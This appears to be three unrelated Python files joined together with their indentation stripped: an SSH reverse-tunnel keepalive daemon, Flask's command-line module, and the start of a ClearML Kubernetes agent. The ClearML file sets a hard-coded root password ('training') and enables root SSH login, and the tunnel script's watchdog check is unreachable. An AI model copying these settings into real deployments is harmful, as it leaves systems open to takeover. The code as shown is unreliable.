parser.add_argument('--ssh-host', help='remote host for ssh connection')
parser.add_argument('--ssh-options', help='additional options for ssh, for example "-tt -o AddressFamily=inet -o ExitOnForwardFailure=yes"')
parser.add_argument('--ssh-forwards', help='forward options for ssh, for example "-R 2001:127.0.0.1:22"')
parser.add_argument('--ssh-key', help='private key for ssh connection, for example "/home/mu_user/.ssh/id_rsa_pf"')
parser.add_argument('--pid-file', help='pid file location')
parser.add_argument('--log-file', help='log file location')
parser.add_argument('--log-level', help='set output level for log messages')
parser.add_argument('--connection-tester-interval', type=int, help='interval for watchdog message check, will break connection if control message not received')
parser.add_argument('--disable-connection-tester', type=bool, help='disable connection testing via remote script if --disable-connection-tester="if_not_empty_string"')
parser.add_argument('--daemon', type=bool, help='enable daemon mode if --daemon="if_not_empty_string"')
args = parser.parse_args()
# init config dictionary
conf = dict()
# get config from json file
conf_file = json.load(open(args.config))
# add parsed from config_file to config dictionary
for key in conf_file:
conf[key] = conf_file[key]
# add parsed args to config dictionary
for key in vars(args):
if vars(args)[key]:
conf[key] = vars(args)[key]
# make int for sure :)
conf['connection-tester-interval'] = int(conf['connection-tester-interval'])
# fork if daemon mode
if conf['daemon']:
if os.fork():
sys.exit()
# write pid file
with open(conf['pid-file'], 'w') as pid:
pid.write(str(os.getpid()))
# open log file
log_file = open(conf['log-file'], 'w')
def do_log(message, level):
'''
Write logs to file or stdout - regarding to log level
Can write to output via appropriate config option
'''
levels = ('debug', 'info', 'none')
if conf['log-level'] == 'output':
print(str(datetime.datetime.now()) + ' ' + str(message).strip())
return
if level == conf['log-level']:
log_file.write(str(datetime.datetime.now()) + ' ' + str(message).strip() + '\n')
log_file.flush()
def receive_stdout_message():
'''
Thread for receiving stdout messages from subprocess
Will test message value if appropriate option is set
Will add message to control set, which checked by watchdog
'''
while data['alive']:
if data.get('stdout'):
message = data['stdout'].readline().decode('UTF-8')[:1]
if not message:
do_log('null stdout: ' + message, 'debug')
time.sleep(1)
# message validation if enabled
if message == '1':
continue
if message != '2':
data['alive'] = False
do_log('Stdout message is not valid, stdout: ' + str(message), 'debug')
continue
data['message'].add(message)
do_log('stdout: ' + message, 'debug')
else:
time.sleep(1)
def receive_stderr_message():
'''Thread for receiving sterror messages from subprocess'''
while data['alive']:
if data.get('stderr'):
message = data['stderr'].readline().decode('UTF-8')
if not message:
time.sleep(1)
continue
do_log('stderr: ' + str(message), 'debug')
else:
time.sleep(1)
def watchdog():
'''Watchdog which check for new messages from stdout thread, if new mesage is not exists, then make signal for all threads stop'''
while data['alive']:
if data.get('stdout'):
try:
time.sleep(conf['connection-tester-interval'])
continue
message = data['message'].pop()
except KeyError:
data['alive'] = False
do_log('No stdout, exit', 'debug')
else:
time.sleep(1)
# Add AddressFamily inet to sshd config, because it forward ip6 only if ipv4 failed and fucks everething
def ssh():
'''
Do ssh to destination host and controll threads count
If threads count not have right value stop all threads and start from scratch
Write controll messages for destination host
'''
template = 'ssh {0} -i {1} {2} {3}@{4}'
command = template.format(conf['ssh-options'],
conf['ssh-key'],
conf['ssh-forwards'],
conf['ssh-user'],
conf['ssh-host']).split()
proc = Popen(command, stdin=PIPE, stdout=PIPE, stderr=PIPE)
# create data exchange points
# stdout exchange point for stdout thread
data['stdout'] = proc.stdout
# stderr exchange point for stderr thread
data['stderr'] = proc.stderr
# exchange point for stdout and watchdog threads
data['message'] = set()
# write to stdin controll messages and signal to stop all threads if any thread is dead
stdin_line = '1\n'
while data['alive']:
# if connection check is disabled then skip threading checks and stdin messages write
if conf['disable-connection-tester']:
message = data['stderr'].readline().decode('UTF-8')
if not message:
break
do_log('stderr: ' + str(message), 'debug')
continue
else:
proc.stdin.write(stdin_line.encode('UTF-8'))
proc.stdin.flush()
time.sleep(2)
# make stop signal if not all thrads rinning
if threading.active_count() != 4:
data['alive'] = False
do_log('Some thread is dead', 'debug')
# main loop, which always run fresh start after all threads exit
while True:
try:
# if connection check is disabled then do not start other threads
if not conf['disable-connection-tester']:
# loo which wait for all threads exit befoe fresh start
while threading.active_count() != 1:
do_log('Waiting for all threads stop Threads count: ' + str(threading.active_count()), 'debug')
data['alive'] = False
time.sleep(1)
# fresh start begin
data = dict()
data['alive'] = True
thread_stdout = threading.Thread(target=receive_stdout_message)
thread_stdout.daemon = True
thread_stdout.start()
thread_stderr = threading.Thread(target=receive_stderr_message)
thread_stderr.daemon = True
thread_stderr.start()
thread_watchdog = threading.Thread(target=watchdog)
thread_watchdog.daemon = True
thread_watchdog.start()
else:
data = dict()
data['alive'] = True
do_log('New iteration Threads count: ' + str(threading.active_count()), 'debug')
do_log('Connection started', 'info')
ssh()
# stop if Ctrl + C
except KeyboardInterrupt:
sys.exit(0)
# write all exceptions to log and keep going
except:
trace = traceback.format_exception(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])
do_log(str(trace), 'info')
time.sleep(1)
|
cli.py
|
import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in {"create_app", "make_app"}:
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
)
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def call_factory(script_info, app_factory, args=None, kwargs=None):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
sig = inspect.signature(app_factory)
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
if "script_info" in sig.parameters:
warnings.warn(
"The 'script_info' argument is deprecated and will not be"
" passed to the app factory function in 2.1.",
DeprecationWarning,
)
kwargs["script_info"] = script_info
if (
not args
and len(sig.parameters) == 1
and next(iter(sig.parameters.values())).default is inspect.Parameter.empty
):
warnings.warn(
"Script info is deprecated and will not be passed as the"
" single argument to the app factory function in 2.1.",
DeprecationWarning,
)
args.append(script_info)
return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
if isinstance(expr, ast.Name):
name = expr.id
args = kwargs = None
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
)
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
)
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = call_factory(script_info, attr, args, kwargs)
except TypeError:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was"
f" raised:\n\n{traceback.format_exc()}"
)
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.")
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
raise exc_info
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path)
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
)
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:], prog_name="python -m flask" if as_module else None)
if __name__ == "__main__":
main(as_module=True)
|
k8s.py
|
from __future__ import print_function, division, unicode_literals
import base64
import functools
import json
import logging
import os
import re
import subprocess
import tempfile
from copy import deepcopy
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Text, List, Callable, Any, Collection, Optional, Union
import yaml
from clearml_agent.commands.events import Events
from clearml_agent.commands.worker import Worker, get_task_container
from clearml_agent.definitions import ENV_DOCKER_IMAGE
from clearml_agent.errors import APIError
from clearml_agent.helper.base import safe_remove_file
from clearml_agent.helper.dicts import merge_dicts
from clearml_agent.helper.process import get_bash_output
from clearml_agent.helper.resource_monitor import ResourceMonitor
from clearml_agent.interface.base import ObjectID
class K8sIntegration(Worker):
K8S_PENDING_QUEUE = "k8s_scheduler"
K8S_DEFAULT_NAMESPACE = "clearml"
AGENT_LABEL = "CLEARML=agent"
LIMIT_POD_LABEL = "ai.allegro.agent.serial=pod-{pod_number}"
KUBECTL_APPLY_CMD = "kubectl apply --namespace={namespace} -f"
KUBECTL_RUN_CMD = "kubectl run clearml-id-{task_id} " \
"--image {docker_image} {docker_args} " \
"--restart=Never " \
"--namespace={namespace}"
KUBECTL_DELETE_CMD = "kubectl delete pods " \
"--selector={selector} " \
"--field-selector=status.phase!=Pending,status.phase!=Running " \
"--namespace={namespace}"
BASH_INSTALL_SSH_CMD = [
"apt-get update",
"apt-get install -y openssh-server",
"mkdir -p /var/run/sshd",
"echo 'root:training' | chpasswd",
"echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config",
"sed -i 's/PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config",
r"sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd",
"echo 'AcceptEnv TRAINS_API_ACCESS_KEY TRAINS_API_SECRET_KEY CLEARML_API_ACCESS_KEY CLEARML_API_SECRET_KEY' "
">> /etc/ssh/sshd_config",
'echo "export VISIBLE=now" >> /etc/profile',
'echo "export PATH=$PATH" >> /etc/profile',
'echo "ldconfig" >> /etc/profile',
"/usr/sbin/sshd -p {port}"]
CONTAINER_BASH_SCRIPT = [
"export DEBIAN_FRONTEND='noninteractive'",
"echo 'Binary::apt::APT::Keep-Downloaded-Packages \"true\";' > /etc/apt/apt.conf.d/docker-clean",
"chown -R root /root/.cache/pip",
"apt-get update",
"apt-get install -y git libsm6 libxext6 libxrender-dev libglib2.0-0",
"declare LOCAL_PYTHON",
"for i in {{10..5}}; do which python3.$i && python3.$i -m pip --version && "
"export LOCAL_PYTHON=$(which python3.$i) && break ; done",
"[ ! -z $LOCAL_PYTHON ] || apt-get install -y python3-pip",
"[ ! -z $LOCAL_PYTHON ] || export LOCAL_PYTHON=python3",
"$LOCAL_PYTHON -m pip install clearml-agent",
"{extra_bash_init_cmd}",
"{extra_docker_bash_script}",
"$LOCAL_PYTHON -m clearml_agent execute --full-monitoring --require-queue --id {task_id}"
]
_edit_hyperparams_version = "2.9"
def __init__(
self,
k8s_pending_queue_name=None,
kubectl_cmd=None,
container_bash_script=None,
debug=False,
ports_mode=False,
num_of_services=20,
base_pod_num=1,
user_props_cb=None,
overrides_yaml=None,
template_yaml=None,
clearml_conf_file=None,
extra_bash_init_script=None,
namespace=None,
max_pods_limit=None,
**kwargs
):
"""
Initialize the k8s integration glue layer daemon
:param str k8s_pending_queue_name: queue name to use when task is pending in the k8s scheduler
:param str|callable kubectl_cmd: kubectl command line str, supports formatting (default: KUBECTL_RUN_CMD)
example: "task={task_id} image={docker_image} queue_id={queue_id}"
or a callable function: kubectl_cmd(task_id, docker_image, docker_args, queue_id, task_data)
:param str container_bash_script: container bash script to be executed in k8s (default: CONTAINER_BASH_SCRIPT)
Notice this string will use format() call, if you have curly brackets they should be doubled { -> {{
Format arguments passed: {task_id} and {extra_bash_init_cmd}
:param bool debug: Switch logging on
:param bool ports_mode: Adds a label to each pod which can be used in services in order to expose ports.
Requires the `num_of_services` parameter.
:param int num_of_services: Number of k8s services configured in the cluster. Required if `port_mode` is True.
(default: 20)
:param int base_pod_num: Used when `ports_mode` is True, sets the base pod number to a given value (default: 1)
:param callable user_props_cb: An Optional callable allowing additional user properties to be specified
when scheduling a task to run in a pod. Callable can receive an optional pod number and should return
a dictionary of user properties (name and value). Signature is [[Optional[int]], Dict[str,str]]
:param str overrides_yaml: YAML file containing the overrides for the pod (optional)
:param str template_yaml: YAML file containing the template for the pod (optional).
If provided the pod is scheduled with kubectl apply and overrides are ignored, otherwise with kubectl run.
:param str clearml_conf_file: clearml.conf file to be use by the pod itself (optional)
:param str extra_bash_init_script: Additional bash script to run before starting the Task inside the container
:param str namespace: K8S namespace to be used when creating the new pods (default: clearml)
:param int max_pods_limit: Maximum number of pods that K8S glue can run at the same time
"""
